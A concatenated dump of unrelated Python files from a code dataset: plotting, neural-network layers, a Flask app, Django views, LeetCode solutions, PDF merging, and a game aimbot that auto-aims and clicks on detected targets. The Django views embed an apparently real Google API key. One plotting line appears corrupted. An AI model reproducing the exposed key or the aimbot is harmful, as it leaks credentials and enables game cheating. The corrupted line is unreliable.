PC_w2, 'o', color='black', markersize=2, alpha=0.2)\n \n ### Fitting a curve\n #AB, cov = np.polyfit(PC_w1,PC_w2, 1, cov=True, full = False)\n #m, b = AB[0], AB[1]\n x_ = np.linspace(-4,4,50)\n #y_ = m*x_+b\n #ax.plot(x_, y_, 'r--') \n \n M,B,samples=linMC(PC_w1, PC_w2, EPC_w1, EPC_w2)\n m = M[0] ; me=0.5*(M[1]+M[2])\n b = B[0] ; be=0.5*(B[1]+B[2])\n y_, yu, yl = linSimul(samples, x_, size=500)\n ax.fill_between(x_, y_+2*yu, y_-2*yl, color='r', alpha=0.5, edgecolor=\"none\")\n ax.plot(x_, m*x_+b, 'r--') \n \n \n delta = np.abs(PC_w2-(m*PC_w1+b))\n rms = np.sqrt(np.median(np.square(delta)))\n ax.text(0,-2, \"m= \"+\"%.3f\" % m+'$\\pm$'+\"%.3f\" % me, fontsize=14)\n ax.text(0,-2.5, \"b= \"+\"%.3f\" % b+'$\\pm$'+\"%.3f\" % be, fontsize=14)\n ax.text(0,-3, r'$RMS=$'+'%.3f'%rms, fontsize=14, color='k') \n plt.errorbar([-2.5], [2.5], xerr=[np.median(EPC_w1)], yerr=[np.median(EPC_w2)], color='k', fmt='o', alpha=0.7, capsize=3, markersize=5)\n \n if binned:\n xl = []\n yl= []\n yel=[]\n \n low = -4; high=3.5\n for i in np.arange(low,high,0.5):\n \n x = []\n y = []\n for ii in range(len(PC_w2)):\n xi = PC_w1[ii]\n if xi>i and xi<=i+0.5:\n x.append(xi)\n y.append(PC_w2[ii])\n if len(x)>0:\n \n x = np.asarray(x)\n y = np.asarray(y)\n \n average = np.median(y)\n stdev = np.std(y)\n \n index = np.where(yaverage-3.*stdev)\n x = x[index]\n y = y[index] \n\n ax.errorbar(np.median(x), np.median(y), yerr=np.std(y), fmt='o', color=color, markersize=5)\n \n xl.append(np.median(x))\n yl.append(np.median(y))\n yel.append(np.std(y))\n \n \n ax.tick_params(which='major', length=6, width=1.5, direction='in')\n ax.tick_params(which='minor', length=4, color='#000033', width=1.0, direction='in')\n ax.minorticks_on()\n \n\n ax.set_ylim([-3.6,3.6]) \n ax.set_xlim([-3.6,3.6]) \n \n if xlabel: ax.set_xlabel(r'$P_{1,w1}$', fontsize=16)\n if ylabel: ax.set_ylabel(r'$P_{1,w2}$', fontsize=16) \n \n if Y_twin:\n y_ax = ax.twinx()\n y_ax.set_ylim(-3.6,3.6)\n y_ax.set_yticklabels([])\n y_ax.minorticks_on()\n y_ax.tick_params(which='major', length=6, width=1.5, direction='in')\n y_ax.tick_params(which='minor', length=4, color='#000033', width=1.0, direction='in') \n \n if X_twin:\n x_ax = ax.twiny()\n x_ax.set_xlim(-3.6,3.6)\n x_ax.set_xticklabels([])\n x_ax.minorticks_on()\n x_ax.tick_params(which='major', length=6, width=1.0, direction='in')\n x_ax.tick_params(which='minor', length=4, color='#000033', width=1.0, direction='in') \n\n \n\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(14) \n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(14) \n\n###########################################################\n\n\n\nplot_array('ESN_HI_catal.csv', scatter=True, binned=False) \n\n\n","sub_path":"Make_reddening_plot5_PC0.py","file_name":"Make_reddening_plot5_PC0.py","file_ext":"py","file_size_in_byte":9748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"652853739","text":"import math\nimport torch\nfrom torch.autograd import Variable\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules import Module\n\nclass GroupBridgeoutFcLayer(Module):\n r\"\"\"Applies the brigdeout transformation to the incoming data: :math:`y = Bx + b`\n\n Args:\n in_features: size of each input sample\n out_features: size of each output sample\n p: dropout probablity\n q: norm of the penalty\n bias: If set to False, the layer will not learn an additive bias.\n Default: True\n\n Shape:\n - Input: :math:`(N, in\\_features)`\n - Output: :math:`(N, out\\_features)`\n\n Attributes:\n weight: the learnable weights of the module of shape\n (out_features x in_features)\n bias: the learnable bias of the module of shape (out_features)\n\n Examples::\n\n >>> m = Bridgeout(20, 30)\n >>> input = autograd.Variable(torch.randn(128, 20))\n >>> output = m(input)\n >>> print(output.size())\n \"\"\"\n\n def __init__(\n self,\n in_features,\n out_features,\n p=0.5,\n q1=2.0,\n q2=2.0,\n target_fraction=1.0,\n bias=True,\n batch_mask=False,\n unit_test_mode=False):\n super(GroupBridgeoutFcLayer, self).__init__()\n self.p=p\n self.q=q1 / 2.0\n self.q2 = q2\n self.target_fraction = target_fraction\n self.in_features = in_features\n self.out_features = out_features\n \n assert not unit_test_mode, 'not implemented'\n assert target_fraction==1.0, 'not implemented'\n \n self.unit_test_mode = unit_test_mode\n \n self.rand_gen = torch.Generator()\n if unit_test_mode: \n self.rand_gen.manual_seed(0)\n \n self.weight = Parameter(torch.Tensor(in_features, out_features))\n self.use_same_mask = batch_mask\n if bias:\n self.bias = Parameter(torch.Tensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n \n\n def reset_parameters(self):\n if self.unit_test_mode:\n self.rand_gen.manual_seed(0)\n stdv = 1. / math.sqrt(self.weight.size(0))\n self.weight.data.uniform_(-stdv, stdv, generator=self.rand_gen)\n if self.bias is not None:\n self.bias.data.uniform_(-stdv, stdv, generator=self.rand_gen)\n\n def forward(self, input_x):\n if self.training:\n if self.unit_test_mode:\n self.rand_gen.manual_seed(0) \n \n bS, inpS = input_x.size()\n outS = self.weight.size()[1]\n \n input_x = input_x.view(bS,1,inpS)\n # not sure why this 1e-15 is needed? but lstm models are giving nans for q < 2 without it\n \n if not self.use_same_mask:\n w = self.weight.expand(bS, inpS, outS)\n wq = torch.norm(w, self.q2, dim=2).add(1e-15).pow( self.q ).unsqueeze(2)\n else:\n w = self.weight\n wq = torch.norm(w, self.q2, dim=1).add(1e-15).pow( self.q ).unsqueeze(1)\n \n noise = w.data.clone()\n noise.bernoulli_(1 - self.p, generator=self.rand_gen).div_(1 - self.p).sub_(1)\n targeting_mask = 1.0\n# if self.target_fraction < 1.0:\n# w_shape = w.size()\n# w_flattened_abs = torch.abs(w.view([w_shape[0], -1]))\n# sorted_indices = torch.argsort(w_flattened_abs, dim=1)\n# n = int(sorted_indices.size()[1]*self.target_fraction)\n# threshold_values = w_flattened_abs.gather(1,sorted_indices)[:,n].view([-1,1])\n# targeting_mask = w_flattened_abs.le(threshold_values).view(w_shape).type(w.dtype)\n# \n \n perturbation_equivalent = wq.mul(Variable(noise)).mul(targeting_mask)\n \n \n w = w.add( perturbation_equivalent )\n if self.bias is not None:\n output = input_x.matmul(w).view(bS,outS).add(self.bias)\n else:\n output = input_x.matmul(w).view(bS,outS)\n else:\n if self.bias is not None:\n output = input_x.matmul(self.weight).add(self.bias)\n else:\n output = input_x.matmul(self.weight)\n \n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ')'\n\n\nif __name__ == '__main__':\n# functional_testing()\n b = GroupBridgeoutFcLayer(2,4, q1=2, q2=2, batch_mask=True).double()\n x = Variable(torch.ones(5, 2).double(), requires_grad=True)\n y = b(x)\n y.backward(torch.ones(y.size()).double())\n print(y)\n [print('p, p.grad', n, p.grad) for n, p in b.named_parameters()]\n# print(y)\n# # b.zero_grad()\n# # y = b(x)\n# # y.backward(torch.ones(y.size()).double())\n# # [print('p, p.grad', n, p.grad) for n, p in b.named_parameters()]\n# # print(y)\n \n","sub_path":"src/group_bridgeout_fc.py","file_name":"group_bridgeout_fc.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466731375","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport os, sys\n\nimport pyautogui\nimport cv2\nimport argparse\nimport re\n\nfrom time import time, sleep\nfrom threading import Thread, Lock\n\nfrom gamecapture import GameCapture\nfrom detection import Detection\nfrom vision import Vision\nfrom utilities import Utilities\n\npyautogui.PAUSE = 0\n\n\nclass AimBot:\n\n running = False\n lock = None\n state = None\n\n active_targets = None\n frame = None\n action_history = None\n start_time = 0\n\n\n def __init__(self):\n self.lock = Lock()\n self.active_targets = []\n self.action_history = []\n self.start_time = time()\n\n \n def shoot(self, target):\n # TODO: PyDirectInput for DirectX on windows\n try:\n pyautogui.moveTo(target[0], target[1])\n pyautogui.click()\n self.action_history.append((time() - self.start_time, target))\n\n except pyautogui.FailSafeException as e:\n pyautogui.moveTo(0, 0)\n #pyautogui.click()\n self.action_history.append((time() - self.start_time, (0, 0)))\n \n\n def start(self):\n self.running = True\n t = Thread(target=self.run)\n t.start()\n\n\n def stop(self):\n self.running = False\n \n \n def update(self, frame):\n self.lock.acquire()\n self.frame = frame\n self.lock.release()\n\n\n def run(self):\n while self.running:\n # TODO: shoot active target\n pass\n\n\ndef main():\n\n sw = pyautogui.size()[0]\n sh = pyautogui.size()[1]\n \n #multi_thread(sw, sh)\n\n single_thread(sw, sh)\n\n\ndef single_thread(sw, sh):\n\n capture = GameCapture(sw, sh)\n detector = Detection()\n vision = Vision()\n aimbot = AimBot()\n\n record = type(args['record']) == str\n if record:\n num = len([re.match(f'^{args[\"record\"]}', f) for f in os.listdir(\"output\")])\n fps = Utilities.fps_test2(sw, sh)\n print(f'FPS: {fps}')\n out = cv2.VideoWriter(f'output/{args[\"record\"]}-{num}.mp4', cv2.VideoWriter_fourcc(*'mp4v'), fps, (sw*2, sh*2))\n \n try:\n while True:\n frame = capture.capture_frame_by_PIL()\n\n boxes = detector.detect_YOLOv3(frame)\n\n target = vision.get_priority_target(boxes)\n frame = vision.draw_bounding_boxes(frame, boxes)\n frame = vision.draw_crosshair(frame, target)\n\n if target is not None:\n aimbot.shoot(target)\n\n if record:\n out.write(frame)\n\n except Exception as e:\n #print(e)\n pass\n\n if record:\n out.release()\n\n with open('output/actions.txt', 'w') as f:\n for action in aimbot.action_history:\n f.write(str(action))\n\n\ndef multi_thread(sw, sh):\n\n capture = GameCapture(sw, sh)\n detector = Detection()\n vision = Vision()\n aimbot = AimBot()\n\n record = type(args['record']) == str\n if record:\n num = len([re.match(f'^{args[\"record\"]}', f) for f in os.listdir(\"output\")])\n fps = Utilities.fps_test(sw, sh)\n out = cv2.VideoWriter(f'output/{args[\"record\"]}-{num}.mp4', cv2.VideoWriter_fourcc(*'mp4v'), fps, (sw*2, sh*2))\n \n capture.start()\n detector.start()\n aimbot.start()\n\n try:\n while True:\n \n if capture.frame is None:\n continue\n \n detector.update(capture.frame)\n\n # TODO: align bounding boxes with the correct frame OR reduce detect time by x10\n target = vision.get_priority_target(detector.boxes)\n frame = vision.draw_bounding_boxes(detector.frame, detector.boxes)\n frame = vision.draw_crosshair(frame, target)\n\n if target is not None:\n aimbot.shoot(target)\n\n if record:\n out.write(frame)\n\n except Exception as e:\n print(e)\n pass\n \n capture.stop()\n detector.stop()\n aimbot.stop()\n\n if record:\n out.release()\n\n with open('output/actions.txt', 'w') as f:\n for action in aimbot.action_history:\n f.write(str(action))\n pass\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--record', metavar='', type=str, default=False, help='Record the live capture to an mp4 file.')\nargs = vars(parser.parse_args())\n\n\nif __name__ == '__main__':\n main()","sub_path":"aimbot.py","file_name":"aimbot.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"444763641","text":"import argparse\nimport parsl\nfrom parsl import *\n\nworkers = ThreadPoolExecutor(max_workers=4)\ndfk = DataFlowKernel(executors=[workers])\n\n\n## Define Apps ##\n@App('bash', dfk)\ndef WireDelay(threshIn='', outputs=[], geoDir='', daqId='', fw=''):\n\t\treturn 'perl perl/WireDelay.pl %s %s %s %s %s' %(threshIn,outputs[0],geoDir,daqId,fw)\n\n#@App('bash', dfk)\n#def WireDelay(inputs=[], outputs=[], geoDir='', daqId='', fw=''):\n#\t\treturn 'perl perl/WireDelay.pl %s %s %s %s %s' %(inputs[0],outputs[0],geoDir,daqId,fw)\n\n@App('bash', dfk)\ndef Combine(inputs=[],outputs=[]):\n\t\t#filenames = [str(i) for i in inputs]\n\t\tprint(\"inside Combine checkpoint 1\")\n\t\tprint(' '.join(filenames) )\n\t\t#print('perl perl/Combine.pl ' + ' '.join(inputs) + ' ' + str(outputs[0]))\n\t\tprint(\"inside Combine checkpoint 2\")\n\t\treturn 'perl perl/Combine.pl ' + ' '.join(inputs) + ' ' + str(outputs[0])\n\n@App('bash', dfk)\ndef Sort(inputs=[], outputs=[], key1='1', key2='1'):\n\t\treturn 'perl perl/Sort.pl %s %s %s %s' %(inputs[0], outputs[0], key1, key2)\n\n@App('bash', dfk)\ndef EventSearch(inputs=[], outputs=[], gate='', detCoinc='2', chanCoinc='2', eventCoinc='2'):\n\t\treturn 'perl perl/EventSearch.pl %s %s %s %s %s %s' %(inputs[0],outputs[0],gate,detCoinc,chanCoinc,eventCoinc)\n\n\n## Parse the command-line arguments ##\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--thresholdAll\", nargs='+', help=\"All threshold files\")\nparser.add_argument(\"--wireDelayData\", nargs='+', help=\"Filenames for intermediate Wire Delay data\")\nparser.add_argument(\"--geoDir\", help=\"Directory containing DAQ ID directories that contain .geo files\")\n#parser.add_argument(\"--geoFiles\", nargs='+', help=\".geo filenames for each CRD\")\nparser.add_argument(\"--detectors\", nargs='+', help=\"IDs of all CRDs in the analysis\")\nparser.add_argument(\"--firmwares\", nargs='+', help=\"DAQ firmware versions\")\nparser.add_argument(\"--combineOut\", help=\"Combined data from all intermediate Wire Delay files\")\nparser.add_argument(\"--sort_sortKey1\")\nparser.add_argument(\"--sort_sortKey2\")\nparser.add_argument(\"--sortOut\")\nparser.add_argument(\"--gate\")\nparser.add_argument(\"--detectorCoincidence\")\nparser.add_argument(\"--channelCoincidence\")\nparser.add_argument(\"--eventCoincidence\")\nparser.add_argument(\"--eventCandidates\", help=\"eventCandidates file\")\n\nargs = parser.parse_args()\n\n\n## The Workflow ##\n\n# 1) WireDelay() takes input Threshold (.thresh) files and converts\n# each to a Wire Delay (.wd) file:\nWireDelay_futures = []\nfor i in range(len(args.thresholdAll)):\n\t\tWireDelay_futures.append(WireDelay(threshIn=args.thresholdAll[i], outputs=[args.wireDelayData[i]], geoDir=args.geoDir, daqId=args.detectors[i],fw=args.firmwares[i]))\n\n# WireDelay_futures is a list of futures.\n# Each future has an outputs list with one output.\nWireDelay_outputs = [i.outputs[0] for i in WireDelay_futures]\n\nprint(\"pre-combine checkpoint\")\n\n# 2) Combine() takes the WireDelay files output by WireDelay() and combines\n# them into a single file with name given by --combineOut\n#print(WireDelay_outputs, [args.combineOut])\nCombine_future = Combine(inputs=WireDelay_outputs, outputs=[args.combineOut])\n\n# 3) Sort() sorts the --combineOut file, producing a new file with name given\n# by --sortOut\nSortFuture = Sort(inputs=Combine_future.outputs, outputs=[args.sortOut], key1=args.sort_sortKey1, key2=args.sort_sortKey2)\n\n\n# 4) EventSearch() processes the --sortOut file and identifies event\n# candidates in a output file with name given by --eventCandidates\n# NB: This output file is interpreted by the e-Lab webapp, which expects it\n# to be named \"eventCandidates\"\nEventSearch(inputs=SortFuture.outputs, outputs=[args.eventCandidates], gate=args.gate, detCoinc=args.detectorCoincidence, chanCoinc=args.channelCoincidence, eventCoinc=args.eventCoincidence)\n","sub_path":"ShowerStudy-Test.py","file_name":"ShowerStudy-Test.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358421816","text":"from flask import *\nimport pandas as pd\nfrom data import get_projections\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n \n projections, grades = get_projections()\n return render_template('index.html', projections=projections, grades=grades)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534177851","text":"# 1537. Get the Maximum Score\n# vwc 200\n# 2021/11/12\n\n# Runtime: 608 ms, faster than 69.07% of Python3 online submissions for Get the Maximum Score.\n# Memory Usage: 31.5 MB, less than 24.74% of Python3 online submissions for Get the Maximum Score.\n\n\n# 贪心算法思维题。\n# 将数组按照共同结点分段\n# 遍历的时候顺着值大的那条路走即可。\n# 解法写的不好,讨论区有更加精妙的解法。\n\nclass Solution:\n def maxSum(self, nums1: List[int], nums2: List[int]) -> int:\n common = set(nums1) & set(nums2)\n\n pos1, pos2 = {0: 0}, {0: 0}\n for i, num in enumerate(nums1):\n if num in common:\n pos1[num] = i\n for i, num in enumerate(nums2):\n if num in common:\n pos2[num] = i\n\n sums1, sums2 = [0], [0]\n for num in nums1:\n sums1.append(sums1[-1] + num)\n for num in nums2:\n sums2.append(sums2[-1] + num)\n common = sorted(common)\n ans, val_l = 0, 0\n for i in range(len(common)):\n l1, l2 = pos1[val_l], pos2[val_l]\n val_r = common[i]\n r1, r2 = pos1[val_r], pos2[val_r]\n ans += max(sums1[r1] - sums1[l1], sums2[r2] - sums2[l2]) % 1_000_000_007\n val_l = common[i]\n l1, l2 = pos1[val_l], pos2[val_l]\n ans += max(sums1[-1] - sums1[l1], sums2[-1] - sums2[l2]) % 1_000_000_007\n return ans % 1_000_000_007\n\n\n","sub_path":"1537. Get the Maximum Score.py","file_name":"1537. Get the Maximum Score.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"62643208","text":"class CustomStack:\n \"\"\"\n O(n) increment\n \"\"\"\n\n def __init__(self, maxSize: int):\n self.stack = []\n self.max_size = maxSize\n\n def push(self, x: int) -> None:\n if len(self.stack) < self.max_size:\n self.stack.append(x)\n\n def pop(self) -> int:\n if self.stack:\n return self.stack.pop()\n return -1\n\n def increment(self, k: int, val: int) -> None:\n for i in range(min(k, len(self.stack))):\n self.stack[i] += val\n\n\nclass CustomStack:\n \"\"\"\n O(1) increment\n \"\"\"\n\n def __init__(self, maxSize: int):\n self.stack = []\n self.max_size = maxSize\n self.inc = []\n\n def push(self, x: int) -> None:\n if len(self.stack) < self.max_size:\n self.stack.append(x)\n self.inc.append(0)\n\n def pop(self) -> int:\n if self.stack:\n if len(self.stack) > 1:\n self.inc[-2] += self.inc[-1]\n return self.stack.pop() + self.inc.pop()\n return -1\n\n def increment(self, k: int, val: int) -> None:\n if self.stack:\n self.inc[min(k, len(self.stack)) - 1] += val\n\n\nif __name__ == \"__main__\":\n customStack = CustomStack(3)\n customStack.push(1)\n customStack.push(2)\n print(customStack.pop())\n customStack.push(2)\n customStack.push(3)\n customStack.push(4)\n customStack.increment(5, 100)\n customStack.increment(2, 100)\n print(customStack.pop())\n print(customStack.pop())\n print(customStack.pop())\n print(customStack.pop())\n","sub_path":"array_stack_queue/1381DesignaStackWithIncrementOperation.py","file_name":"1381DesignaStackWithIncrementOperation.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326574366","text":"print('welcome to program that displays the pythogeran triplets within a given range')#welcome message\nlimit=int(input('enter the highest range till which you would like to see the triplets\\n='))\nm=2\nwhile m**2= 9999:\n message_add = \"登録可能な一連番号が無いため、登録を行えません。\"\n #except Exception:\n #pass\n if not message_add:\n start_date = datetime.datetime.strptime(start_date, '%Y/%m/%d').strftime('%Y-%m-%d')\n if release_date != \"\":\n release_date = datetime.datetime.strptime(release_date, '%Y/%m/%d').strftime('%Y-%m-%d')\n models.Project.objects.create(PROJECT_ID=get_next_value('festival_classification_seq'),\n START_DATE=start_date, PROJECT_NO=project_no,\n PROJECT_NAME=project_name, PROTYPE_CODE_id=protype_code,\n LANGUAGE_CODE_id=language_code, SUMMARY=summary,\n STATUS_CODE_id=status_code, CUSTOMER=customer, CHARGE=charge,\n REVIEWER=reviewer, RELEASE_DATE=release_date, REMARKS=remarks)\n return redirect('/add/')\n else:\n models.Project.objects.create(PROJECT_ID=get_next_value('festival_classification_seq'),\n START_DATE=start_date, PROJECT_NO=project_no,\n PROJECT_NAME=project_name, PROTYPE_CODE_id=protype_code,\n LANGUAGE_CODE_id=language_code, SUMMARY=summary,\n STATUS_CODE_id=status_code, CUSTOMER=customer, CHARGE=charge,\n REVIEWER=reviewer, REMARKS=remarks)\n return redirect('/add/')\n return render(request, 'add.html', locals())\n add_form = ProjectForm()\n return render(request, 'add.html', locals())\n\n\ndef list_req(request):\n projects = models.Project.objects.all().order_by('PROJECT_ID')\n message_list = \"\"\n if projects.count() == 0:\n message_list = \"レコードが登録されていません。\"\n return render(request, 'list.html', {'message_list': message_list})\n for p in projects:\n p.PROTYPE_CODE_id = models.ProjectType.objects.get(PROTYPE_CODE=p.PROTYPE_CODE_id).PROTYPE_NAME\n p.LANGUAGE_CODE_id = models.Language.objects.get(LANGUAGE_CODE=p.LANGUAGE_CODE_id).LANGUAGE_NAME\n p.STATUS_CODE_id = models.Status.objects.get(STATUS_CODE=p.STATUS_CODE_id).STATUS_NAME\n p.PROJECT_ID = '{:0=4}'.format(p.PROJECT_ID)\n if p.RELEASE_DATE is None:\n p.RELEASE_DATE = \"\"\n url_form = UrlForm(initial={'now_url': request.path})\n url_form.fields['now_url'].widget = forms.HiddenInput()\n d = {\n 'projects': projects,\n 'message_list': message_list,\n 'url_form': url_form,\n }\n return render(request, 'list.html', d)\n\n\ndef isalnum(s):\n return re.compile(r'^[a-zA-Z0-9]+$').match(s) is not None\n\n\ndef isdateformat(date_text):\n return re.compile(r'^\\d{4}/\\d{2}/\\d{2}$').match(date_text) is not None\n\n\ndef isdate(date_text):\n try:\n datetime.datetime.strptime(date_text, '%Y/%m/%d')\n except ValueError:\n return False\n return True\n\n\ndef edit(request, project_id):\n if request.method == 'GET':\n url_form = UrlForm(request.GET)\n if url_form.is_valid():\n if url_form.cleaned_data['now_url'] == \"\":\n return render(request, 'error.html')\n else:\n return render(request, 'error.html')\n project = models.Project.objects.get(PROJECT_ID=project_id)\n message_add = \"\"\n if request.method == 'POST':\n form = ProjectForm(request.POST)\n form.fields['start_date'].required = False\n form.fields['project_no'].required = False\n form.fields['project_name'].required = False\n form.fields['protype_code'].required = False\n if form.is_valid():\n language_code = form.cleaned_data['language_code'].LANGUAGE_CODE\n summary = form.cleaned_data['summary']\n status_code = form.cleaned_data['status_code'].STATUS_CODE\n customer = form.cleaned_data['customer']\n charge = form.cleaned_data['charge']\n reviewer = form.cleaned_data['reviewer']\n release_date = form.cleaned_data['release_date']\n remarks = form.cleaned_data['remarks']\n if language_code == \"\":\n message_add = message_add + \"開発言語が選択されていません。\\n\"\n if status_code == \"\":\n message_add = message_add + \"状態が選択されていません。\\n\"\n if release_date != \"\":\n if not isdateformat(release_date):\n message_add = message_add + \"リリース日は yyyy/MM/dd の形式で入力してください。\\n\"\n elif not isdate(release_date):\n message_add = message_add + \"リリース日はカレンダーに存在しない日付です。\\n\"\n if message_add == \"\":\n project.LANGUAGE_CODE_id = language_code\n project.SUMMARY = summary\n project.STATUS_CODE_id = status_code\n project.CUSTOMER = customer\n project.CHARGE = charge\n project.REVIEWER = reviewer\n if release_date != \"\":\n release_date = datetime.datetime.strptime(release_date, '%Y/%m/%d').strftime('%Y-%m-%d')\n project.RELEASE_DATE = release_date\n project.REMARKS = remarks\n project.save()\n return redirect('/list/')\n else:\n form = ProjectForm(initial={\n 'project_id': project.PROJECT_ID,\n 'start_date': project.START_DATE.strftime('%Y/%m/%d'),\n 'project_no': project.PROJECT_NO,\n 'project_name': project.PROJECT_NAME,\n 'protype_code': project.PROTYPE_CODE_id,\n 'language_code': language_code,\n 'summary': summary,\n 'status_code': status_code,\n 'customer': customer,\n 'charge': charge,\n 'reviewer': reviewer,\n 'release_date': release_date,\n 'remarks': remarks,\n })\n form.fields['start_date'].disabled = True\n form.fields['project_no'].disabled = True\n form.fields['project_name'].disabled = True\n form.fields['protype_code'].disabled = True\n d = {\n 'project': form,\n 'project_id': project.PROJECT_ID,\n 'message_add': message_add,\n }\n return render(request, 'change.html', d)\n if project.RELEASE_DATE is None:\n rel_date = \"\"\n else:\n rel_date = project.RELEASE_DATE.strftime('%Y/%m/%d')\n form = ProjectForm(initial={\n 'project_id': project.PROJECT_ID,\n 'start_date': project.START_DATE.strftime('%Y/%m/%d'),\n 'project_no': project.PROJECT_NO,\n 'project_name': project.PROJECT_NAME,\n 'protype_code': project.PROTYPE_CODE_id,\n 'language_code': project.LANGUAGE_CODE_id,\n 'summary': project.SUMMARY,\n 'status_code': project.STATUS_CODE_id,\n 'customer': project.CUSTOMER,\n 'charge': project.CHARGE,\n 'reviewer': project.REVIEWER,\n 'release_date': rel_date,\n 'remarks': project.REMARKS,\n })\n form.fields['start_date'].disabled = True\n form.fields['project_no'].disabled = True\n form.fields['project_name'].disabled = True\n form.fields['protype_code'].disabled = True\n d = {\n 'project': form,\n 'project_id': project.PROJECT_ID,\n 'message_add': message_add,\n }\n return render(request, 'change.html', d)\n\n\ndef delete(request, project_id):\n project = models.Project.objects.get(PROJECT_ID=project_id)\n project.delete()\n return redirect('/list/')\n\n\ndef emotion(request):\n if request.method == 'POST':\n key = \"AIzaSyBbKSOqrwtXdRLV-owLDaP4shCoV8o_V7U\"\n url = 'https://language.googleapis.com/v1/documents:analyzeSentiment?key=' + key\n emotion_form = EmotionForm(request.POST)\n result = \"\"\n detail = {}\n if emotion_form.is_valid():\n text = emotion_form.cleaned_data['input_text']\n header = {'Content-Type': 'application/json'}\n body = {\n \"document\": {\n \"type\": \"PLAIN_TEXT\",\n \"language\": \"JA\",\n \"content\": text\n },\n \"encodingType\": \"UTF8\"\n }\n response = requests.post(url, headers=header, json=body).json()\n result = result + \"総合振れ幅:\" + str(response[\"documentSentiment\"][\"magnitude\"]) + \"\\n\"\n result = result + \"総合score(顧客満足度):\" + str(response[\"documentSentiment\"][\"score\"]) + \"\\n\"\n for i in response[\"sentences\"]:\n detail[i[\"text\"][\"content\"]] = [str(i[\"sentiment\"][\"score\"]), i[\"sentiment\"][\"magnitude\"]]\n retresult = {\n 'result': result,\n 'emotion_form': emotion_form,\n 'detail': detail,\n }\n return render(request, 'emotion.html', retresult)\n emotion_form = EmotionForm()\n return render(request, 'emotion.html', {'emotion_form': emotion_form})\n","sub_path":"login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"239770304","text":"import PyPDF2\r\n\r\n# Using xxx for page level editing of PDF files\r\n# Note that PyPDF2 module cannot write text to a pdf\r\n\r\n\r\n# Using pythons built-in open() method to read binary pdf files\r\npdf1File = open('meetingminutes1.pdf', 'rb')\r\npdf2File = open('meetingminutes2.pdf', 'rb')\r\n\r\n# Parse binary to reader object using PyPDF2 module\r\nreader1 = PyPDF2.PdfFileReader(pdf1File)\r\nreader2 = PyPDF2.PdfFileReader(pdf2File)\r\n\r\n# Creating a writer object (a pdf file, still not stored on disk)\r\nwriter = PyPDF2.PdfFileWriter()\r\n\r\n# Run through first pdf file, page by page, and add each page to the writer object\r\nfor pageNum in range(reader1.numPages):\r\n page = reader1.getPage(pageNum)\r\n writer.addPage(page)\r\n\r\nfor pageNum in range(reader2.numPages):\r\n page = reader2.getPage(pageNum)\r\n writer.addPage(page)\r\n\r\n# Save writer object to disk (PDF file)\r\noutputFile = open('combinedminutes.pdf', 'wb')\r\nwriter.write(outputFile)\r\n\r\noutputFile.close()\r\npdf1File.close()\r\npdf2File.close()\r\n","sub_path":"examples/editPDF_PyPDF2_example.py","file_name":"editPDF_PyPDF2_example.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"346401173","text":"\"\"\"\nProjet de session IFT780\nDate:\nAuthors: Alexandre Turpin, Quentin Levieux and Adrien Verdier\nLicense: Opensource, free to use\nOther: This File represent the AlexNet Model\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom src.models.CNNBlocks import ConvBlock\n\n\nclass AlexNet(nn.Module):\n \"\"\"\n Class used to implement the AlexNet model\n \"\"\"\n\n def __init__(self, in_channels, num_classes):\n \"\"\"\n Args:\n in_channels: The input channel for this model\n num_classes: The number of classes\n \"\"\"\n super(AlexNet, self).__init__()\n\n self.conv1 = nn.Sequential(\n ConvBlock(in_channels, 96, kernel_size=11, stride=4, padding=0),\n nn.MaxPool2d(kernel_size=3, stride=2)\n )\n\n self.conv2 = nn.Sequential(\n ConvBlock(96, 256, kernel_size=5, stride=1, padding=2),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n\n self.conv3 = ConvBlock(256, 384, kernel_size=3, stride=1, padding=1)\n\n self.conv4 = ConvBlock(384, 384, kernel_size=3, stride=1, padding=1)\n\n self.conv5 = nn.Sequential(\n ConvBlock(384, 256, kernel_size=3, stride=1, padding=1),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n\n self.linear_layers = nn.Sequential(\n nn.Linear(256 * 6 * 6, 4096),\n nn.Dropout(p=0.5),\n nn.Linear(4096, 4096),\n nn.Dropout(p=0.5),\n nn.Linear(4096, num_classes),\n )\n\n def forward(self, x):\n \"\"\"\n This method implement the forward propagation of our model\n Args :\n x: The input of the model\n\n Returns :\n out: The output of the model\n \"\"\"\n out = self.conv1(x)\n out = self.conv2(out)\n out = self.conv3(out)\n out = self.conv4(out)\n out = self.conv5(out)\n\n out = out.view(out.size(0), -1)\n\n out = self.linear_layers(out)\n\n out = 